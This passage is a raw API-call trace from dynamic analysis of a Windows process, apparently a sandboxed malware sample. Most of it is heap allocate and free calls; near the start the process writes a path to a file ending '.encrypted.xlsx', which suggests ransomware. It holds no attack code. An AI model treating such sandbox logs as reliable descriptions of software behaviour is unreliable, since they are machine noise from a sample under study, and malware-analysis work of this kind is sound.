lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.encrypted.xlsx\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f3630 [0032.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.encrypted.xlsx\r\n", cchWideChar=73, lpMultiByteStr=0x7f3630, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.encrypted.xlsx\r\n", lpUsedDefaultChar=0x0) returned 73 [0032.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.789] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0032.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.790] CloseHandle (hObject=0x128) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.792] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.792] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.792] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.792] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0032.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.793] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.795] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: 